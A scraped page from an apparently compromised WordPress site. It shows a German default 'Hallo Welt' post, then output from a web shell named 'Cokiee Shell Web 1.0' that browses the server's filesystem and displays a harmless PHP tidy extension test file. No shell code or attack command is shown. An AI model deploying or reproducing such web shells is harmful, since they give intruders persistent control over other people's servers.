Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/ext/tidy/tests/ |
Current File : //proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/ext/tidy/tests/024.phpt |
--TEST-- libtidy handling of 'new-blocklevel-tags' --SKIPIF-- <?php if (!extension_loaded('tidy')) die('skip'); if (strtotime(tidy_get_release()) < strtotime('20 january 2007')) die ('skip old libtidy'); ?> --FILE-- <?php // more info at http://sf.net/tracker/?func=detail&atid=390963&aid=1598422&group_id=27659 $contents = ' <wps:block> <wps:var> <wps:value></wps:value> </wps:var> </wps:block>'; $config = array( 'doctype' => 'omit', 'new-blocklevel-tags' => 'wps:block,wps:var,wps:value', 'newline' => 'LF' ); $tidy = tidy_parse_string($contents, $config, 'utf8'); $tidy->cleanRepair(); echo $tidy; ?> --EXPECTF-- <html> <head> <title></title> </head> <body> <wps:block>%w<wps:var>%w<wps:value></wps:value>%w</wps:var>%w</wps:block> </body> </html>
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare